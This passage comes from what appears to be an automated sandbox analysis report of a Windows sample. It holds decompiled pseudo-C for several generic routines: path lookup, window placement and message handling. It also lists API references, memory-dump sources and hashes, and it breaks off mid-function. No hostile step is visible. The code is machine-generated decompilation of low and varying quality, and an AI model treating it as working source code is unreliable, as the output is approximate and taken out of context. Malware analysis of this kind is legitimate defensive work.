      • Opcode Fuzzy Hash: 6cc17476dc2698392d0e410eccae24de7198a0cf54c4321817fdb7559798ceca
      • Instruction Fuzzy Hash: E4A100B0E457149FDB00EB659CA6F2677A8EB29700F105777B404DF292D6BDAC008B9E
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00405F34 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144stringlibraryfileCOMMON
      Download Yara Rule
      C-Code - Quality: 53%
      			E00405F34(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				_Unknown_base(*)()* _v28;
				struct _WIN32_FIND_DATAA _v346;
				char _v607;
				char* _t75;
				char* _t85;
				void* _t108;
				void* _t112;
				struct HINSTANCE__* _t114;
				void* _t115;
				void* _t116;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t114 = GetModuleHandleA("kernel32.dll");
				if(_t114 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_v20 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_v20 = E00405F08(_v8 + 2);
							if( *_v20 != 0) {
								_v20 = E00405F08(_v20 + 1);
								if( *_v20 != 0) {
									L10:
									_t108 = _v20 - _v8;
									_push(_t108 + 1);
									_push(_v8);
									_push( &_v607);
									L00401338();
									while( *_v20 != 0) {
										_v24 = E00405F08(_v20 + 1);
										_t112 = _v24 - _v20;
										if(_t112 + _t108 + 1 <= 0x105) {
											_push(_t112 + 1);
											_push(_v20);
											_push( &(( &_v607)[_t108]));
											L00401338();
											_t115 = FindFirstFileA( &_v607,  &_v346);
											if(_t115 != 0xffffffff) {
												FindClose(_t115);
												_t75 =  &(_v346.cFileName);
												_push(_t75);
												L00401340();
												if(_t75 + _t108 + 1 + 1 <= 0x105) {
													 *((char*)(_t116 + _t108 - 0x25b)) = 0x5c;
													_push(0x105 - _t108 - 1);
													_push( &(_v346.cFileName));
													_push( &(( &(( &_v607)[_t108]))[1]));
													L00401338();
													_t85 =  &(_v346.cFileName);
													_push(_t85);
													L00401340();
													_t108 = _t108 + _t85 + 1;
													_v20 = _v24;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v607);
									_push(_v8);
									L00401338();
								}
							}
						}
					}
				} else {
					_v28 = GetProcAddress(_t114, "GetLongPathNameA");
					if(_v28 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v607);
						_push(_v8);
						if(_v28() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v607);
							_push(_v8);
							L00401338();
						}
					}
				}
				L17:
				return _v16;
			}


















      0x00405f40
      0x00405f43
      0x00405f49
      0x00405f56
      0x00405f5a
      0x00405fa0
      0x00405fa6
      0x00405fef
      0x00000000
      0x00405fa8
      0x00405faf
      0x00405fc0
      0x00405fc9
      0x00405fd8
      0x00405fe1
      0x00405ff2
      0x00405ff5
      0x00405ffb
      0x00405fff
      0x00406006
      0x00406007
      0x004060bc
      0x0040601a
      0x00406020
      0x0040602d
      0x00406034
      0x00406038
      0x00406041
      0x00406042
      0x0040605a
      0x0040605f
      0x00406062
      0x00406067
      0x0040606d
      0x0040606e
      0x0040607e
      0x00406080
      0x00406090
      0x00406097
      0x004060a1
      0x004060a2
      0x004060a7
      0x004060ad
      0x004060ae
      0x004060b4
      0x004060b9
      0x00000000
      0x004060b9
      0x0040607e
      0x0040605f
      0x00000000
      0x0040602d
      0x004060cb
      0x004060d2
      0x004060d6
      0x004060d7
      0x004060d7
      0x00405fe1
      0x00405fc9
      0x00405faf
      0x00405f5c
      0x00405f67
      0x00405f6e
      0x00000000
      0x00405f70
      0x00405f70
      0x00405f7b
      0x00405f7f
      0x00405f85
      0x00000000
      0x00405f87
      0x00405f8a
      0x00405f91
      0x00405f95
      0x00405f96
      0x00405f96
      0x00405f85
      0x00405f6e
      0x004060dc
      0x004060e5

      APIs
      • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,0048E0A8), ref: 00405F51
      • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405F62
      • lstrcpyn.KERNEL32(?,?,?,?,?,0048E0A8), ref: 00405F96
      • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,?,0048E0A8), ref: 00406007
      • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll,?,?,0048E0A8), ref: 00406042
      • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll,?,?,0048E0A8), ref: 00406055
      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll,?,?,0048E0A8), ref: 00406062
      • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,?,?,0048E0A8), ref: 0040606E
      • lstrcpyn.KERNEL32(?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 004060A2
      • lstrlen.KERNEL32(?,?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 004060AE
      • lstrcpyn.KERNEL32(?,?,?,?,?,?,00000104,?,00000000,?,?,?,?,?,?,?), ref: 004060D7
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
      • String ID: GetLongPathNameA$\$kernel32.dll
      • API String ID: 3245196872-1565342463
      • Opcode ID: cff0fbaffe13a2c73daf49a6396f4cf4de9f544e97ebb51611a1cb52ce2d600a
      • Instruction ID: ff1af111cfb2876d1c5f465b6992c7cfacd73e47febd5bc0b03d64561f0af370
      • Opcode Fuzzy Hash: cff0fbaffe13a2c73daf49a6396f4cf4de9f544e97ebb51611a1cb52ce2d600a
      • Instruction Fuzzy Hash: 3B512671900629EFDB11DBA9CC89AEFB7B8AF08304F1405A6B505F7281D7389E408B68
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00460740 Relevance: 18.4, APIs: 12, Instructions: 407windowCOMMON
      Download Yara Rule
      C-Code - Quality: 84%
      			E00460740(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _t149;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t160;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				struct HWND__* _t166;
				long _t176;
				signed int _t198;
				signed int _t199;
				long _t220;
				intOrPtr _t226;
				int _t231;
				intOrPtr _t232;
				intOrPtr _t241;
				intOrPtr _t245;
				signed int _t248;
				intOrPtr _t251;
				intOrPtr _t252;
				signed int _t258;
				long _t259;
				intOrPtr _t262;
				intOrPtr _t266;
				signed int _t269;
				intOrPtr _t270;
				intOrPtr _t271;
				signed int _t277;
				long _t278;
				intOrPtr _t281;
				signed int _t286;
				signed int _t287;
				long _t290;
				intOrPtr _t294;
				struct HWND__* _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				long _t308;
				signed int _t311;
				signed int _t313;
				long _t314;
				signed int _t317;
				signed int _t318;
				signed int _t326;
				long _t328;
				intOrPtr _t331;
				intOrPtr _t362;
				long _t370;
				void* _t372;
				void* _t373;
				intOrPtr _t374;

				_t372 = _t373;
				_t374 = _t373 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t372);
				_push(0x460caa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {
					_t294 =  *0x48f9cc; // 0x423b08
					E00406A3C(_t294, 0,  &_v12);
					E0040CBEC(_v12, 1);
					E004043D0();
				}
				_t149 =  *0x490b7c; // 0x2481268
				E004650E0(_t149);
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
				_push(_t372);
				_push(0x460c8d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t155 = _v8;
					_t378 =  *((char*)(_t155 + 0x1a6));
					if( *((char*)(_t155 + 0x1a6)) == 0) {
						_push(_t372);
						_push(0x460b94);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E00403DF8(_v8, __eflags);
						 *[fs:eax] = 0;
						_t160 =  *0x490b80; // 0x2480e74
						_t127 = _t160 + 0x6c; // 0x0
						__eflags =  *_t127 - _v8;
						if( *_t127 == _v8) {
							__eflags = 0;
							E0045F8EC(_v8, 0);
						}
						_t162 = _v8;
						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
						if( *((char*)(_t162 + 0x22f)) != 1) {
							_t163 = _v8;
							__eflags =  *(_t163 + 0x2f4) & 0x00000008;
							if(( *(_t163 + 0x2f4) & 0x00000008) == 0) {
								_t299 = 0;
								_t165 = E0044B158(_v8);
								_t166 = GetActiveWindow();
								__eflags = _t165 - _t166;
								if(_t165 == _t166) {
									_t176 = IsIconic(E0044B158(_v8));
									__eflags = _t176;
									if(_t176 == 0) {
										_t299 = E0045B4F4(E0044B158(_v8));
									}
								}
								__eflags = _t299;
								if(_t299 == 0) {
									ShowWindow(E0044B158(_v8), 0);
								} else {
									SetWindowPos(E0044B158(_v8), 0, 0, 0, 0, 0, 0x97);
									SetActiveWindow(_t299);
								}
							} else {
								SetWindowPos(E0044B158(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E00448688(_v8);
						}
					} else {
						_push(_t372);
						_push(0x4607f8);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E00403DF8(_v8, _t378);
						 *[fs:eax] = 0;
						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
							if( *((char*)(_v8 + 0x22f)) != 1) {
								_t301 = E00461FD4() -  *(_v8 + 0x48);
								__eflags = _t301;
								_t302 = _t301 >> 1;
								if(_t301 < 0) {
									asm("adc ebx, 0x0");
								}
								_t198 = E00461FC8() -  *(_v8 + 0x4c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc eax, 0x0");
								}
							} else {
								_t241 =  *0x490b7c; // 0x2481268
								_t31 = _t241 + 0x44; // 0x0
								_t305 = E0044432C( *_t31) -  *(_v8 + 0x48);
								_t302 = _t305 >> 1;
								if(_t305 < 0) {
									asm("adc ebx, 0x0");
								}
								_t245 =  *0x490b7c; // 0x2481268
								_t34 = _t245 + 0x44; // 0x0
								_t248 = E00444370( *_t34) -  *(_v8 + 0x4c);
								_t199 = _t248 >> 1;
								if(_t248 < 0) {
									asm("adc eax, 0x0");
								}
							}
							if(_t302 < 0) {
								_t302 = 0;
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							_t326 = _t199;
							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
							if( *((char*)(_v8 + 0x57)) != 0) {
								E0045EB94(_v8, _t326);
							}
						} else {
							_t251 =  *((intOrPtr*)(_v8 + 0x230));
							__eflags = _t251 + 0xfa - 2;
							if(_t251 + 0xfa - 2 >= 0) {
								__eflags = _t251 - 5;
								if(_t251 == 5) {
									_t252 = _v8;
									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
									if( *((char*)(_t252 + 0x22f)) != 1) {
										_t307 = E00462004() -  *(_v8 + 0x48);
										__eflags = _t307;
										_t308 = _t307 >> 1;
										if(_t307 < 0) {
											asm("adc ebx, 0x0");
										}
										_t258 = E00461FF8() -  *(_v8 + 0x4c);
										__eflags = _t258;
										_t259 = _t258 >> 1;
										if(_t258 < 0) {
											asm("adc eax, 0x0");
										}
									} else {
										_t262 =  *0x490b7c; // 0x2481268
										_t82 = _t262 + 0x44; // 0x0
										_t311 = E0044432C( *_t82) -  *(_v8 + 0x48);
										__eflags = _t311;
										_t308 = _t311 >> 1;
										if(_t311 < 0) {
											asm("adc ebx, 0x0");
										}
										_t266 =  *0x490b7c; // 0x2481268
										_t85 = _t266 + 0x44; // 0x0
										_t269 = E00444370( *_t85) -  *(_v8 + 0x4c);
										__eflags = _t269;
										_t259 = _t269 >> 1;
										if(_t269 < 0) {
											asm("adc eax, 0x0");
										}
									}
									__eflags = _t308;
									if(_t308 < 0) {
										_t308 = 0;
										__eflags = 0;
									}
									__eflags = _t259;
									if(_t259 < 0) {
										_t259 = 0;
										__eflags = 0;
									}
									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								}
							} else {
								_t270 =  *0x490b7c; // 0x2481268
								_t52 = _t270 + 0x44; // 0x0
								_t370 =  *_t52;
								_t271 = _v8;
								__eflags =  *((char*)(_t271 + 0x230)) - 7;
								if( *((char*)(_t271 + 0x230)) == 7) {
									_t362 =  *0x459e0c; // 0x459e58
									_t290 = E00403D88( *(_v8 + 4), _t362);
									__eflags = _t290;
									if(_t290 != 0) {
										_t370 =  *(_v8 + 4);
									}
								}
								__eflags = _t370;
								if(_t370 == 0) {
									_t313 = E00461FD4() -  *(_v8 + 0x48);
									__eflags = _t313;
									_t314 = _t313 >> 1;
									if(_t313 < 0) {
										asm("adc ebx, 0x0");
									}
									_t277 = E00461FC8() -  *(_v8 + 0x4c);
									__eflags = _t277;
									_t278 = _t277 >> 1;
									if(_t277 < 0) {
										asm("adc eax, 0x0");
									}
								} else {
									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
									__eflags = _t317;
									_t318 = _t317 >> 1;
									if(_t317 < 0) {
										asm("adc ebx, 0x0");
									}
									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
									__eflags = _t286;
									_t287 = _t286 >> 1;
									if(_t286 < 0) {
										asm("adc eax, 0x0");
									}
									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
								}
								__eflags = _t314;
								if(_t314 < 0) {
									_t314 = 0;
									__eflags = 0;
								}
								__eflags = _t278;
								if(_t278 < 0) {
									_t278 = 0;
									__eflags = 0;
								}
								_t328 = _t278;
								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								_t281 = _v8;
								__eflags =  *((char*)(_t281 + 0x57));
								if( *((char*)(_t281 + 0x57)) != 0) {
									E0045EB94(_v8, _t328);
								}
							}
						}
						 *((char*)(_v8 + 0x230)) = 0;
						if( *((char*)(_v8 + 0x22f)) != 1) {
							ShowWindow(E0044B158(_v8),  *(0x48ee98 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
						} else {
							if( *(_v8 + 0x22b) != 2) {
								ShowWindow(E0044B158(_v8),  *(0x48ee98 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
								__eflags = _t220;
								CallWindowProcA(0x407548, E0044B158(_v8), 5, 0, _t220);
								E00444B88();
							} else {
								_t231 = E0044B158(_v8);
								_t232 =  *0x490b7c; // 0x2481268
								_t105 = _t232 + 0x44; // 0x0
								SendMessageA( *( *_t105 + 0x254), 0x223, _t231, 0);
								ShowWindow(E0044B158(_v8), 3);
							}
							_t226 =  *0x490b7c; // 0x2481268
							_t119 = _t226 + 0x44; // 0x0
							SendMessageA( *( *_t119 + 0x254), 0x234, 0, 0);
						}
					}
				}
				_pop(_t331);
				 *[fs:eax] = _t331;
				_push(0x460c94);
				_t154 = _v8;
				 *(_t154 + 0x2f4) =  *(_t154 + 0x2f4) & 0x000000fb;
				return _t154;
			}


























































      0x00460741
      0x00460743
      0x0046074b
      0x0046074e
      0x00460753
      0x00460754
      0x00460759
      0x0046075c
      0x00460766
      0x00460777
      0x0046077c
      0x0046078b
      0x00460790
      0x00460790
      0x00460795
      0x0046079a
      0x004607a2
      0x004607ab
      0x004607ac
      0x004607b1
      0x004607b4
      0x004607be
      0x004607c4
      0x004607c7
      0x004607ce
      0x00460b72
      0x00460b73
      0x00460b78
      0x00460b7b
      0x00460b85
      0x00460b8f
      0x00460bab
      0x00460bb0
      0x00460bb3
      0x00460bb6
      0x00460bb8
      0x00460bbd
      0x00460bbd
      0x00460bc2
      0x00460bc5
      0x00460bcc
      0x00460bdb
      0x00460bde
      0x00460be5
      0x00460c06
      0x00460c0b
      0x00460c12
      0x00460c17
      0x00460c19
      0x00460c24
      0x00460c29
      0x00460c2b
      0x00460c3a
      0x00460c3a
      0x00460c2b
      0x00460c3c
      0x00460c3e
      0x00460c70
      0x00460c40
      0x00460c58
      0x00460c5e
      0x00460c5e
      0x00460be7
      0x00460bff
      0x00460bff
      0x00460bce
      0x00460bd1
      0x00460bd1
      0x004607d4
      0x004607d6
      0x004607d7
      0x004607dc
      0x004607df
      0x004607e9
      0x004607f3
      0x00460819
      0x00460845
      0x0046088e
      0x0046088e
      0x00460891
      0x00460893
      0x00460895
      0x00460895
      0x004608a5
      0x004608a5
      0x004608a8
      0x004608aa
      0x004608ac
      0x004608ac
      0x00460847
      0x00460847
      0x0046084c
      0x00460859
      0x0046085c
      0x0046085e
      0x00460860
      0x00460860
      0x00460863
      0x00460868
      0x00460873
      0x00460876
      0x00460878
      0x0046087a
      0x0046087a
      0x00460878
      0x004608b1
      0x004608b3
      0x004608b3
      0x004608b7
      0x004608b9
      0x004608b9
      0x004608c9
      0x004608d2
      0x004608df
      0x004608e8
      0x004608e8
      0x004608f2
      0x004608f5
      0x00460900
      0x00460903
      0x004609d7
      0x004609d9
      0x004609df
      0x004609e2
      0x004609e9
      0x00460a32
      0x00460a32
      0x00460a35
      0x00460a37
      0x00460a39
      0x00460a39
      0x00460a49
      0x00460a49
      0x00460a4c
      0x00460a4e
      0x00460a50
      0x00460a50
      0x004609eb
      0x004609eb
      0x004609f0
      0x004609fd
      0x004609fd
      0x00460a00
      0x00460a02
      0x00460a04
      0x00460a04
      0x00460a07
      0x00460a0c
      0x00460a17
      0x00460a17
      0x00460a1a
      0x00460a1c
      0x00460a1e
      0x00460a1e
      0x00460a1c
      0x00460a53
      0x00460a55
      0x00460a57
      0x00460a57
      0x00460a57
      0x00460a59
      0x00460a5b
      0x00460a5d
      0x00460a5d
      0x00460a5d
      0x00460a76
      0x00460a76
      0x00460909
      0x00460909
      0x0046090e
      0x0046090e
      0x00460911
      0x00460914
      0x0046091b
      0x00460923
      0x00460929
      0x0046092e
      0x00460930
      0x00460935
      0x00460935
      0x00460930
      0x00460938
      0x0046093a
      0x00460973
      0x00460973
      0x00460976
      0x00460978
      0x0046097a
      0x0046097a
      0x0046098a
      0x0046098a
      0x0046098d
      0x0046098f
      0x00460991
      0x00460991
      0x0046093c
      0x00460942
      0x00460942
      0x00460945
      0x00460947
      0x00460949
      0x00460949
      0x0046094c
      0x00460955
      0x00460955
      0x00460958
      0x0046095a
      0x0046095c
      0x0046095c
      0x0046095f
      0x0046095f
      0x00460994
      0x00460996
      0x00460998
      0x00460998
      0x00460998
      0x0046099a
      0x0046099c
      0x0046099e
      0x0046099e
      0x0046099e
      0x004609ae
      0x004609b7
      0x004609bd
      0x004609c0
      0x004609c4
      0x004609cd
      0x004609cd
      0x004609c4
      0x00460903
      0x00460a7f
      0x00460a90
      0x00460b66
      0x00460a96
      0x00460aa0
      0x00460af3
      0x00460b07
      0x00460b07
      0x00460b1c
      0x00460b24
      0x00460aa2
      0x00460aa7
      0x00460ab2
      0x00460ab7
      0x00460ac1
      0x00460ad1
      0x00460ad1
      0x00460b32
      0x00460b37
      0x00460b41
      0x00460b41
      0x00460a90
      0x004607ce
      0x00460c77
      0x00460c7a
      0x00460c7d
      0x00460c82
      0x00460c85
      0x00460c8c

      APIs
      • SendMessageA.USER32 ref: 00460AC1
        • Part of subcall function 00406A3C: LoadStringA.USER32 ref: 00406A6E
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: LoadMessageSendString
      • String ID:
      • API String ID: 1946433856-0
      • Opcode ID: 73ea2d5c4c0ef2b079c0237674638869fd581acf0527dbb0ac26a8cbb8ddf6e5
      • Instruction ID: 37ce2b4a73ae6a1b5853b6695998a87bf99b5cb514ed57883eaeb8c138a67e3b
      • Opcode Fuzzy Hash: 73ea2d5c4c0ef2b079c0237674638869fd581acf0527dbb0ac26a8cbb8ddf6e5
      • Instruction Fuzzy Hash: F8F15031A04244EFEB00DBA9C985F5E77F5AB14304F1445BAE5009B3A2E778FE00DB49
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0044B468 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON
      Download Yara Rule
      C-Code - Quality: 75%
      			E0044B468(void* __eax) {
				void* _v28;
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				void* _t43;
				struct HWND__* _t45;
				struct tagPOINT* _t47;

				_t47 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0x180)) == 0) {
					GetWindowRect( *(_t43 + 0x180), _t47);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
					if(_t45 != 0) {
						ScreenToClient(_t45, _t47);
						ScreenToClient(_t45,  &_v64);
					}
				}
				 *(_t43 + 0x40) = _t47->x;
				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
				return E00443F7C(_t43);
			}










      0x0044b46b
      0x0044b46e
      0x0044b47e
      0x0044b4ad
      0x0044b480
      0x0044b480
      0x0044b494
      0x0044b49f
      0x0044b4a0
      0x0044b4a1
      0x0044b4a2
      0x0044b4a2
      0x0044b4c5
      0x0044b4d5
      0x0044b4d9
      0x0044b4dd
      0x0044b4e8
      0x0044b4e8
      0x0044b4d9
      0x0044b4f0
      0x0044b4f7
      0x0044b501
      0x0044b50c
      0x0044b51c

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$ClientLongScreen$IconicPlacementRect
      • String ID: ,
      • API String ID: 2266315723-3772416878
      • Opcode ID: a70d0863ca9d4e10ee8ef8e9fd25834a5cefe88e8f05bbbdcd75466a05b9101d
      • Instruction ID: e299eae4dcb0df41df3ce569a678132f396490dc605855cd552e64c6ced266c9
      • Opcode Fuzzy Hash: a70d0863ca9d4e10ee8ef8e9fd25834a5cefe88e8f05bbbdcd75466a05b9101d
      • Instruction Fuzzy Hash: 82117F71904200ABDB11DF6DC885E9B37E8AF49354F04852AFD58DB282D738ED04CB96
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0045893C Relevance: 10.9, APIs: 7, Instructions: 405nativeCOMMONCrypto
      Download Yara Rule
      C-Code - Quality: 91%
      			E0045893C(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				signed int _v16;
				char _v17;
				intOrPtr _v24;
				int _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr _t137;
				signed int _t138;
				intOrPtr _t144;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t153;
				void* _t158;
				struct HMENU__* _t160;
				intOrPtr* _t165;
				void* _t173;
				signed int _t177;
				signed int _t181;
				void* _t182;
				void* _t186;
				void* _t214;
				void* _t218;
				struct HDC__* _t221;
				void* _t251;
				void* _t253;
				signed int _t257;
				void* _t265;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t290;
				signed int _t291;
				intOrPtr _t306;
				intOrPtr _t328;
				intOrPtr _t337;
				intOrPtr _t341;
				intOrPtr* _t348;
				signed int _t350;
				intOrPtr* _t351;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				intOrPtr* _t370;
				void* _t372;
				void* _t373;
				intOrPtr _t374;
				void* _t375;

				_t372 = _t373;
				_t374 = _t373 + 0xffffffd0;
				_t292 = 0;
				_v52 = 0;
				_t370 = __edx;
				_v8 = __eax;
				_push(_t372);
				_push(0x458e6f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				_t137 =  *__edx;
				_t375 = _t137 - 0x111;
				if(_t375 > 0) {
					_t138 = _t137 - 0x117;
					__eflags = _t138;
					if(_t138 == 0) {
						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t271;
						if(_t271 < 0) {
							goto L67;
						} else {
							_t272 = _t271 + 1;
							_t362 = 0;
							__eflags = 0;
							while(1) {
								_t150 = E00457CB8(E00419C84(_v8, _t292, _t362),  *(_t370 + 4), __eflags);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L68;
								}
								_t362 = _t362 + 1;
								_t272 = _t272 - 1;
								__eflags = _t272;
								if(_t272 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
					} else {
						_t151 = _t138 - 8;
						__eflags = _t151;
						if(_t151 == 0) {
							_v17 = 0;
							__eflags =  *(__edx + 6) & 0x00000010;
							if(( *(__edx + 6) & 0x00000010) != 0) {
								_v17 = 1;
							}
							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t274;
							if(__eflags < 0) {
								L32:
								_t153 =  *0x48f840; // 0x490b7c
								E00464FF0( *_t153, 0, __eflags);
								goto L67;
							} else {
								_t275 = _t274 + 1;
								_t363 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _v17 - 1;
									if(_v17 != 1) {
										_v12 =  *(_t370 + 4) & 0x0000ffff;
									} else {
										_t160 =  *(_t370 + 8);
										__eflags = _t160;
